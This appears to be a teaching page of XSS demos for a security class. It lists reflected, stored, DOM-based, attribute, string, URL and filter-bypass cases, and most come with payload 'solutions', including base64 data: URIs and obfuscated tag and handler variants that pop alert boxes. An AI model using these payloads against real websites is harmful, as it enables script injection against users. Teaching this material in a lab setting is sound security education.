Sam Bowne

XSS Demos

1. Reflected XSS

Message:

Pop up a box

Solution

<script>alert("Reflected XSS Vulnerability!");</script>
Note: XSS Auditor stops this attack in Chrome and Safari on the Mac, and something blocks it in Opera. It works in Firefox.

2. More Reflected XSS Demos

3. Stored XSS Demos

4. DOM-Based XSS Demos

https://attack.samsclass.info/xss4.htm?message=hi

https://attack.samsclass.info/xss4.htm?message=<script>alert('Hi')</script>

5. Tag Attribute Value

Image Resizer

Height:
Width:

Solutions

50%'><script>alert(1)</script>

50%' onclick='alert(1)

6. JavaScript String

Variable a:

Solutions

'; alert(1); var b='

7. URL

URL:

Solutions

javascript:alert(1);

http://www.ccsf.edu' onclick='javascript:alert(1)

8. Blocking SCRIPT Tags

Message:

Solutions

Third one works in Chrome!
<object data="data:text/html,<script>alert(1)</script>">

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click here</a>

9. Obfuscation

Message:

Examples

<script>alert(1);</script>

<xml onreadystatechange=alert(1)>

<input autofocus onfocus=alert(1)>

<x onclick=alert(1) src=a>Click here</x>

<script/anyjunk>alert(1);</script>

<img/onerror="alert(1)"src=a>

<img/anyjunk/onerror="alert(1)"src=a>

<<script>alert(1);<</script>

<script<{alert(1)}/></script>

<script>a\u006cert(1);</script>

<script>a\l\ert\(1\);</script>

<img onerror=eval('al\u0065rt(1)') src=a>


Last modified: 11-21-16 3 pm